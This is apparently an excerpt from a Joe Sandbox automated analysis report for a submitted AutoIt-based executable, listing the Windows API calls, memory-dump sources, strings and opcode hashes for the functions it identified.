                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                • String ID:
                                                • API String ID: 2550207440-0
                                                • Opcode ID: 148ef1dbce5227e56b34e09841ee106e26920361c44d50065e1b0d91fa047f87
                                                • Instruction ID: de43210863cf6dd09675dc264b1f14575ccda69dbb8db402c8801cd81d3bf2c4
                                                • Opcode Fuzzy Hash: 148ef1dbce5227e56b34e09841ee106e26920361c44d50065e1b0d91fa047f87
                                                • Instruction Fuzzy Hash: 7F91E175A006199FDB00EF94C889BBEBFB9FF85311F104429E901FB291D774A946CB98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
                                                • Instruction ID: 3cb3b983fbfa0f9e69b899443e4a6e3a1e498c1d3afaa14e7ea96eee4cdfe8c9
                                                • Opcode Fuzzy Hash: 83f3c22fb306f6be88ca3d7481be7fa10cefbf19928e3787af2bff1dfcc73a85
                                                • Instruction Fuzzy Hash: 46910671E00219AFCB14CFA9D888AEEBFB8FF4A320F144555E515B7291D774A941CBA0
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0059396B
                                                • CharUpperBuffW.USER32(?,?), ref: 00593A7A
                                                • _wcslen.LIBCMT ref: 00593A8A
                                                • VariantClear.OLEAUT32(?), ref: 00593C1F
                                                  • Part of subcall function 00580CDF: VariantInit.OLEAUT32(00000000), ref: 00580D1F
                                                  • Part of subcall function 00580CDF: VariantCopy.OLEAUT32(?,?), ref: 00580D28
                                                  • Part of subcall function 00580CDF: VariantClear.OLEAUT32(?), ref: 00580D34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4137639002-1221869570
                                                • Opcode ID: d1de0cec47eb83c8b73fed0c5b2871f7964d3ad9d0ec9e0fbbb42569a274da58
                                                • Instruction ID: dc642ee4a540e05f302883e646ca5ec0a6347dd7f755bcea8d9dc74af3d1ce25
                                                • Opcode Fuzzy Hash: d1de0cec47eb83c8b73fed0c5b2871f7964d3ad9d0ec9e0fbbb42569a274da58
                                                • Instruction Fuzzy Hash: 769136756083069FCB10EF28C49596ABBE5FF89314F14882DF88997351DB30EE45CB92
                                                APIs
                                                  • Part of subcall function 0057000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
                                                  • Part of subcall function 0057000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
                                                  • Part of subcall function 0057000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
                                                  • Part of subcall function 0057000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00594C51
                                                • _wcslen.LIBCMT ref: 00594D59
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00594DCF
                                                • CoTaskMemFree.OLE32(?), ref: 00594DDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 614568839-2785691316
                                                • Opcode ID: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
                                                • Instruction ID: 60621b3f739e646e4d965c75ee284f12d03f14d315a975b55d033b0dbefe4138
                                                • Opcode Fuzzy Hash: 0d877d0f5680bbfd8bc4b1a12b15a4521c267de10851dd49e1813de6f20319c2
                                                • Instruction Fuzzy Hash: 80911671D0021AAFDF10DFA4D895EEEBBB8BF48310F108569E919A7241DB309E45CF60
                                                APIs
                                                • GetMenu.USER32(?), ref: 005A2183
                                                • GetMenuItemCount.USER32(00000000), ref: 005A21B5
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005A21DD
                                                • _wcslen.LIBCMT ref: 005A2213
                                                • GetMenuItemID.USER32(?,?), ref: 005A224D
                                                • GetSubMenu.USER32(?,?), ref: 005A225B
                                                  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A22E3
                                                  • Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                • String ID:
                                                • API String ID: 4196846111-0
                                                • Opcode ID: deacf3830d8861101780d6197a2ba610c0aaa59550de352db55d4be65323758f
                                                • Instruction ID: c20852dbd681ee844113cfb4df46e37ba3a5a5cefbeecbe0b2aa2c3e45403db4
                                                • Opcode Fuzzy Hash: deacf3830d8861101780d6197a2ba610c0aaa59550de352db55d4be65323758f
                                                • Instruction Fuzzy Hash: 55714B75A00215AFCB10DF68C846AAEBFF5BF8A310F148469E916AB351DB34ED418B90
                                                APIs
                                                • GetParent.USER32(?), ref: 0057AEF9
                                                • GetKeyboardState.USER32(?), ref: 0057AF0E
                                                • SetKeyboardState.USER32(?), ref: 0057AF6F
                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057AF9D
                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057AFBC
                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 0057AFFD
                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0057B020
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
                                                • Instruction ID: 7be483fbd37eb13ca928255f13004dd394cd7099eaf4d2ad01014ca44ad8056f
                                                • Opcode Fuzzy Hash: 4f1173effa0c305a0a07e059feb70ada640a78b3b7c93d56ff0aa68b6667f26a
                                                • Instruction Fuzzy Hash: 4351D1A06087D53DFB3682349C49BBEBEA96B46304F08C589E1DD958C3D398ACC8E751
                                                APIs
                                                • GetParent.USER32(00000000), ref: 0057AD19
                                                • GetKeyboardState.USER32(?), ref: 0057AD2E
                                                • SetKeyboardState.USER32(?), ref: 0057AD8F
                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0057ADBB
                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0057ADD8
                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0057AE17
                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0057AE38
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$Parent
                                                • String ID:
                                                • API String ID: 87235514-0
                                                • Opcode ID: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
                                                • Instruction ID: 2a5d4e7a1b1f96e325617f309cc14afbe8a8c276494c597c50560d8cea99cd91
                                                • Opcode Fuzzy Hash: c43deac456268518980e2d445fc184cb9d67f655e4d90ae42bd94ce82bec954f
                                                • Instruction Fuzzy Hash: 8D51B3A15047D53DFB3783249C55BBE7EA97B86300F08C589E5DD868C2D294EC88F762
                                                APIs
                                                • GetConsoleCP.KERNEL32(00553CD6,?,?,?,?,?,?,?,?,00545BA3,?,?,00553CD6,?,?), ref: 00545470
                                                • __fassign.LIBCMT ref: 005454EB
                                                • __fassign.LIBCMT ref: 00545506
                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00553CD6,00000005,00000000,00000000), ref: 0054552C
                                                • WriteFile.KERNEL32(?,00553CD6,00000000,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 0054554B
                                                • WriteFile.KERNEL32(?,?,00000001,00545BA3,00000000,?,?,?,?,?,?,?,?,?,00545BA3,?), ref: 00545584
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                • Instruction ID: 24808c6eb1eebcecf855a58c8dca5a9990f6fc865d75660e9bc5a7327662084e
                                                • Opcode Fuzzy Hash: 682d5176a5f3b3f1c0d048d993e3aceda236afee3b24c48ac106d56ed995fb66
                                                • Instruction Fuzzy Hash: 4B51E270A00649AFDB11CFA8D885AEEBFF9FF09304F14451AF955E7292E7309A41CB60
                                                APIs
                                                  • Part of subcall function 0059304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                  • Part of subcall function 0059304E: _wcslen.LIBCMT ref: 0059309B
                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00591112
                                                • WSAGetLastError.WSOCK32 ref: 00591121
                                                • WSAGetLastError.WSOCK32 ref: 005911C9
                                                • closesocket.WSOCK32(00000000), ref: 005911F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 2675159561-0
                                                • Opcode ID: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                • Instruction ID: 04beafee710abd91a90cd2a77743609229ea6634105e9c3ca98ffbced2de8dcd
                                                • Opcode Fuzzy Hash: 52c1d0984418bdefbaf55567892f54968910bd33872977c18160b35f4cdbc218
                                                • Instruction Fuzzy Hash: 7C412531600616AFEB109F14C888BA9BFE9FF85324F148059FD169B291C774ED85DBE4
                                                APIs
                                                  • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                  • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0057CF45
                                                • MoveFileW.KERNEL32(?,?), ref: 0057CF7F
                                                • _wcslen.LIBCMT ref: 0057D005
                                                • _wcslen.LIBCMT ref: 0057D01B
                                                • SHFileOperationW.SHELL32(?), ref: 0057D061
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 3164238972-1173974218
                                                • Opcode ID: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                • Instruction ID: ada66f8667195852e43d9519554c622855c0565a0c124dc18f69882a95181e2f
                                                • Opcode Fuzzy Hash: b2adf41d0e0980f70a79bc6dd2825a0315901cbbea0c00f4b0856cc63b38b3cf
                                                • Instruction Fuzzy Hash: FA4158719052195FDF12EFA4D985BDD7FB8BF49340F0040E6E509E7141EA34A688DB50
                                                APIs
                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A2E1C
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E4F
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2E84
                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005A2EB6
                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005A2EE0
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 005A2EF1
                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005A2F0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LongWindow$MessageSend
                                                • String ID:
                                                • API String ID: 2178440468-0
                                                • Opcode ID: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
                                                • Instruction ID: 1ece014ebc33cc210ac4a3980a161cae4336022ef94b4a8af5ac0834027a5871
                                                • Opcode Fuzzy Hash: a10d1cbca326467a2bf8d54234813347081dd57b8fbb8e05d43d1b0f40771c60
                                                • Instruction Fuzzy Hash: EC31E230604150AFDB25CF5CDC86F693BE9FBAA710F150164F944CF2A2CB71A884EB41
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577769
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0057778F
                                                • SysAllocString.OLEAUT32(00000000), ref: 00577792
                                                • SysAllocString.OLEAUT32(?), ref: 005777B0
                                                • SysFreeString.OLEAUT32(?), ref: 005777B9
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 005777DE
                                                • SysAllocString.OLEAUT32(?), ref: 005777EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 9b357f3757675ea6193aa3eb07c3e6a6d1622eea56f768f78aff5107d63e2e52
                                                • Instruction ID: 2c3f50426a146e8d2bc7d00069235f1cea404695fe4d317a572107786424b804
                                                • Opcode Fuzzy Hash: 9b357f3757675ea6193aa3eb07c3e6a6d1622eea56f768f78aff5107d63e2e52
                                                • Instruction Fuzzy Hash: CA21AE7660421DAFDF14DFA8EC88CBB7BACFB0E3647008425BA18DB190D670DC469764
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577842
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577868
                                                • SysAllocString.OLEAUT32(00000000), ref: 0057786B
                                                • SysAllocString.OLEAUT32 ref: 0057788C
                                                • SysFreeString.OLEAUT32 ref: 00577895
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 005778AF
                                                • SysAllocString.OLEAUT32(?), ref: 005778BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 2353690a7d64af4df6c91fdc47f123bc3805bf443831cf0f3e37044705d9dfbe
                                                • Instruction ID: f04f6c16220ee9e93ed60939c5d961383f60e93ca6d7507fa7efb3135eb97a5d
                                                • Opcode Fuzzy Hash: 2353690a7d64af4df6c91fdc47f123bc3805bf443831cf0f3e37044705d9dfbe
                                                • Instruction Fuzzy Hash: A0215E31608219AF9F109BA8EC8CDBA7BECFB0D7607108125B919CB2A1DA74DC45DB65
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 005804F2
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0058052E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
                                                • Instruction ID: 9c7d3147b386a8114e02b5750a2c6f5bd12c813dd4f1ddfa126cea67167ce39d
                                                • Opcode Fuzzy Hash: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
                                                • Instruction Fuzzy Hash: 90212C75600305AFDF60AF69D844A9A7FE4BF55724F204A19ECA1E62E0E7709948DF30
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 005805C6
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00580601
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
                                                • Instruction ID: e5c723a863d6c6fe7cf82ad9c551b56497688e16fb38169c5e756eea4dd4cab2
                                                • Opcode Fuzzy Hash: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
                                                • Instruction Fuzzy Hash: AB2153755003059FDB60AF6A9C04A6A7FE4BF95720F205B19FCA1F72E0E7709969CB20
                                                APIs
                                                  • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                  • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
                                                  • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005A4112
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005A411F
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005A412A
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005A4139
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005A4145
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
                                                • Instruction ID: cb4d0cc8cb859647043195d014e59a02076571dedb0c9a3cb7cb2736a4013ce4
                                                • Opcode Fuzzy Hash: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
